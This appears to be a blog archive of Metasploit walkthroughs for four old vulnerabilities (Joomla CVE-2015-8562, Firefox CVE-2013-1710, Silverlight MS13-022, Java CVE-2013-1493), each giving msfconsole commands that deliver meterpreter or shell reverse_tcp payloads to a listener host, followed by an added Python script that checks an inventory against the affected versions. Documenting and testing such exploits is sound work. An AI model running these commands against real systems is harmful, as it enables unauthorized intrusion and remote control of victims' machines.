Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2015-8562 Joomla HTTP Header Unauthenticated RCE

Timeline :

Vulnerability discovered being exploited in the wild
Patched by the vendor on 2015-12-14
Metasploit PoC provided on 2015-12-16

PoC provided by :

Marc-Alexandre Montpas
Christian Mehlmauer

Reference(s) :

CVE-2015-8562
20151201

Affected version(s) :

All Joomla versions from 1.5.0 to 3.4.5 inclusive.
To exploit this vulnerability, the PHP version on the target must also be vulnerable to the session deserialisation bug (the affected PHP versions are listed in the description).

Tested on :

Joomla 3.4.5 on Linux ubuntu-1210 with PHP 5.4.6-1ubuntu1

Description :

Joomla suffers from an unauthenticated remote code execution vulnerability that affects all versions from 1.5.0 to 3.4.5. Because user-supplied headers are stored in the database's session table, it is possible to truncate the input by sending a UTF-8 character. The custom-crafted payload is then executed once the session is read back from the database. The target also needs a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13: in later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP patch was included in Ubuntu in versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20, and in Debian in version 5.4.45-0+deb7u1.

Commands :

use exploit/multi/http/joomla_http_header_rce
set RHOST 192.168.6.143
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo

CVE-2013-1710 Firefox toString console.time Privileged Javascript Injection

Timeline :

Vulnerability discovered by moz_bug_r_a4
Vulnerability reported to the vendor by moz_bug_r_a4 on 2013-05-12
Patched by the vendor on 2013-08-06
Metasploit PoC provided on 2014-08-15

PoC provided by :

moz_bug_r_a4
Cody Crews
joev

Reference(s) :

CVE-2013-1710
MFSA-2013-69

Affected version(s) :

All Mozilla Firefox versions from 15 to 22 inclusive.

Tested on :

Windows 7 SP1 with Mozilla Firefox 22.0

Description :

This exploit gains remote code execution on Firefox 15-22 by abusing two separate JavaScript-related vulnerabilities to ultimately inject malicious JavaScript code into a context running with chrome:// privileges.

Commands :

use exploit/multi/browser/firefox_tostring_console_injection
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp
set LHOST 192.168.6.138
exploit

SYSTEMINFO

MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access

Timeline :

Vulnerability discovered by James Forshaw
Patched by the vendor on 2013-03-12
PoC provided by Vitaliy Toropov on 2013-10-23
Discovered being used in exploit kits on 2013-11-13
Metasploit PoC provided on 2013-11-22

PoC provided by :

James Forshaw
Vitaliy Toropov
juan vazquez

Reference(s) :

CVE-2013-0074
CVE-2013-3896
OSVDB-91147
OSVDB-98223
BID-58327
BID-62793
MS13-022
MS13-087

Affected version(s) :

All versions of Microsoft Silverlight 5 below 5.1.20125.0.

Tested on :

Windows 7 SP1 with Microsoft Silverlight version 5.1.20125.0

Description :

This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists in the Initialize() method of System.Windows.Browser.ScriptObject, which accesses memory in an unsafe manner. Since it is reachable from untrusted (user-controlled) code, it is possible to dereference arbitrary memory, which can be leveraged into arbitrary code execution. In order to bypass DEP/ASLR, a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 – IE10, Windows XP SP3 / Windows 7 SP1.

Commands :

use exploit/windows/browser/ms13_022_silverlight_script_object
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo
getuid

CVE-2013-1493 Java CMM Remote Code Execution

Timeline :

Discovered being exploited in the wild in 2013-02
Metasploit PoC provided on 2013-03-26
Patched by the vendor on 2013-04-16

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2013-1493
OSVDB-90737
BID-58238
Oracle Security Alert for CVE-2013-1493

Affected version(s) :

Oracle Java SE 7 Update 15 and before
Oracle Java SE 6 Update 41 and before

Tested on :

Windows 7 SP1 with Java SE 7 Update 15

Description :

This module abuses the Color Management classes from a Java applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in February and March of 2013. The vulnerability affects Java versions 7u15 and earlier and 6u41 and earlier, and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn't bypass click-to-play, so the user must accept the Java warning in order to run the malicious applet.

Commands :

use exploit/windows/browser/java_cmm
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid
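A defensive check that turns the affected-version statements of the four advisories above into an inventory scan: Joomla 1.5.0 to 3.4.5 together with PHP before 5.4.45 (5.3.x included), 5.5.29 or 5.6.13 for CVE-2015-8562, Firefox 15 to 22 for CVE-2013-1710, Silverlight 5 below 5.1.20125.0 for CVE-2013-0074, and Java 7u15 / 6u41 and earlier for CVE-2013-1493. This is an added example, not code from the original posts or from the Metasploit modules; the product keys, the `ADVISORIES` rule table and the sample inventory are my own constructions, and the parser compares upstream version numbering only, so the Ubuntu and Debian PHP builds that backported the fix (named in the Joomla post) are not evaluated and must be judged by package version.

```python
import re

# Affected-version rules transcribed from the four advisories on this page.
# Each rule: (CVE, lowest affected version or None, bound, bound_inclusive).
# A version is compared only on the components the bound spells out, so
# ((15,), (22,), True) means "15.x through 22.x inclusive".
ADVISORIES = {
    "joomla": [("CVE-2015-8562", (1, 5, 0), (3, 4, 5), True)],
    "php": [  # the session-deserialisation fix the Joomla exploit depends on
        ("CVE-2015-8562", None, (5, 4, 45), False),   # everything before 5.4.45, 5.3.x included
        ("CVE-2015-8562", (5, 5), (5, 5, 29), False),
        ("CVE-2015-8562", (5, 6), (5, 6, 13), False),
    ],
    "firefox": [("CVE-2013-1710", (15,), (22,), True)],
    "silverlight": [("CVE-2013-0074", (5,), (5, 1, 20125, 0), False)],
    "java": [  # "7u15" / "7 Update 15" notation, as used in the advisory
        ("CVE-2013-1493", (7,), (7, 15), True),
        ("CVE-2013-1493", (6,), (6, 41), True),
    ],
}


def parse_version(text):
    """Turn '5.4.6-1ubuntu1', '3.4.5', '5.1.20125.0' or '7 Update 15' into a tuple of ints.

    Anything after '-', '+' or '~' (a distribution package suffix) is dropped, so the
    result reflects upstream numbering only: a distro build that backported the fix is
    still reported as affected here and has to be judged by its package version.
    """
    core = re.split(r"[-+~]", text.strip(), maxsplit=1)[0]
    nums = tuple(int(n) for n in re.findall(r"\d+", core))
    if not nums:
        raise ValueError("no numeric version in %r" % text)
    return nums


def _prefix(version, bound):
    """The first len(bound) components of version, zero-padded (so 22.0 compares as 22)."""
    return (version + (0,) * len(bound))[: len(bound)]


def affected(product, version):
    """Return the CVEs from the page whose affected range covers this product version."""
    v = parse_version(version)
    hits = []
    for cve, low, high, inclusive in ADVISORIES[product.lower()]:
        if low is not None and _prefix(v, low) < low:
            continue  # below the first affected version of this rule
        hv = _prefix(v, high)
        if (hv <= high) if inclusive else (hv < high):
            if cve not in hits:
                hits.append(cve)
    return hits


def check_inventory(inventory):
    """Map each (product, version) pair of an inventory to its matching CVEs."""
    return {(p, ver): affected(p, ver) for p, ver in inventory}


if __name__ == "__main__":
    # Constructed sample inventory; the first two entries are the Joomla post's own test host.
    sample = [("joomla", "3.4.5"), ("php", "5.4.6-1ubuntu1"), ("php", "5.6.13"),
              ("firefox", "22.0"), ("silverlight", "5.1.20125.0"), ("java", "7 Update 15")]
    for (product, ver), cves in check_inventory(sample).items():
        print(f"{product:12} {ver:18} {', '.join(cves) or 'not affected by these advisories'}")
```

Running the script prints one verdict per inventory entry; the page's own Joomla test host (Joomla 3.4.5 with PHP 5.4.6-1ubuntu1) is flagged on both counts, while the exact patch-level versions (PHP 5.6.13, Silverlight 5.1.20125.0) fall outside the affected ranges, which is the boundary the advisories draw.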